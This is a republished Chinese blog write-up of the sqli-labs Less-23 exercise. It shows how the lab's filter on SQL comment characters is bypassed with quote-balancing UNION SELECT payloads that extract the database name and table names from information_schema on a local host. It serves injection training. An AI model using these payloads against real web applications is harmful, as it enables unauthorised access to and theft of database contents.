sqli-labs(23)
发布时间:2020-12-14 05:59:10 所属栏目:百科 来源:网络整理
导读:基于get的过滤了的注入 0X1测试闭合 127.0 . 0.1 /sql1/Less- 23 /?id= 1 ‘ ? http: // 127.0.0.1/sql1/Less-23/?id=1%27%27 ?0X02 然后就是组合拳的操作了 未报错 那么应该是’闭合 那么我们可以尝试用# 闭合 这里要url编码一次 so 我们用%23 ?id= 1 ‘ or
基于get的过滤了的注入 0X1测试闭合 127.0.0.1/sql1/Less-23/?id=1‘ ? http://127.0.0.1/sql1/Less-23/?id=1%27%27 ?0X02 然后就是组合拳的操作了 未报错那么应该是’闭合 那么我们可以尝试用# 闭合 这里要url编码一次 so 我们用%23 ?id=1‘ order by 1%23 ? 但是为什么还报错 我们来看看源代码 原来这里用正则表达式过滤了 # --这两种闭合 第二种我还没有试过...哈哈 ? ?那我们只能用单引号闭合喽 因为单引号里面的不会被执行 所以我们用and 闭合 构造语句 ?id=1‘ and ‘1‘=‘1 ? 正确 ?id=-1‘ union select 1,database(),3 and ‘1‘=‘1 0X01爆表名 a 爆列名 ?id=-1‘ order by 100 and ‘1‘=‘1 ? ?id=-1‘ union select 1,(select table_name from information_schema.tables where table_schema=‘security‘ limit 0,1),3 and ‘1‘=‘1 (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |